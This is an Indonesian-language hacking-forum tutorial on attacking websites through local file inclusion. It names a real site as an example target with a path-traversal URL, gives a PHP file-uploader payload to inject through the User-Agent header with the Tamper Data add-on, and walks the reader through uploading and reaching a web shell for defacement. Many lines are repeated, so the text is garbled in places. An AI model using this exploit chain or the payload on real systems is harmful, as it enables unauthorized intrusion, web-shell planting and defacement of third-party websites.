home
LFI with tamper data
Submitted by triplezix
LFI with tamper data
sekedar berbagi pengetahuan,buat yang belum tau aja ,klo yang udah master pasti dah tau trick ini
bagai mana cara melakukan hacking/deface atau sejenisnya terhadap sebuah website yang mempunyai bugs LFI
bagai mana cara melakukan hacking/deface atau sejenisnya terhadap sebuah website yang mempunyai bugs LFI
owkeh,langkah pertama yaitu cari target
anda bisa memanfaatkan bugs lfi yang banyak bertebaran di google
atau juga menggunakan tools,scanner :D
anda bisa memanfaatkan bugs lfi yang banyak bertebaran di google
atau juga menggunakan tools,scanner :D
ok.....anggap saja kita sudah menemukan target
yang vuln,hasil scan kita di mirc
tamper data sudah di instal,klo belom,instal dulu
https://addons.mozilla.org/en-US/firefox/addon/966/
oh iaa promosi juga neh
jgn lupa gabung di channel irc.byroe.net #makzcyber
yang vuln,hasil scan kita di mirc
tamper data sudah di instal,klo belom,instal dulu
https://addons.mozilla.org/en-US/firefox/addon/966/
oh iaa promosi juga neh
jgn lupa gabung di channel irc.byroe.net #makzcyber
contoh target yang kita temukan yaitu
http://old[dot]diendandulich[dot]com/diendan//index.php?option=com_g2bridge&controller=../../../../../../../../
http://old[dot]diendandulich[dot]com/diendan//index.php?option=com_g2bridge&controller=../../../../../../../../
buka mozilla dan temper data anda
tools->tamper data
klik star tamper
lalu load broser yang tadi
maka akan muncul command
dan klik tamper
lalu load broser yang tadi
maka akan muncul command
dan klik tamper
pada kolom user agent masukkan script berikut :
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>
lalu tekan OK,apabila script berhasil di injeksikan kedalam web tersebut maka akan muncul tampilan form upload,
nah pada sesion inilah anda dapat melakukan uploading shell :D
nah pada sesion inilah anda dapat melakukan uploading shell :D
lalu oplod shell anda,maka akan muncul kembali form tamper data tersebut,masukkan kembali script di atas,apa bila shell berhasil ter upload kedalam web
tersebut,maka akan muncul tulisan UPLOAD SUKSES :D
tersebut,maka akan muncul tulisan UPLOAD SUKSES :D
sekarang shell anda berhasil di injeksikan ke dalam web tersebut,untuk mengaksesnya
anda tinggal mengetikkan di browser anda
anda tinggal mengetikkan di browser anda
http://www/target.com/nama shell.php
lalu setetlah itu terserah anda,
sekian dulu triknya,sekedar share pengetahuan yang saya punya
untuk videonya :
thanks buat :touya,gameover,hitamputih,hylalnetheroes,pangeran hakisha,zifoe and makassarhacker.com
Home
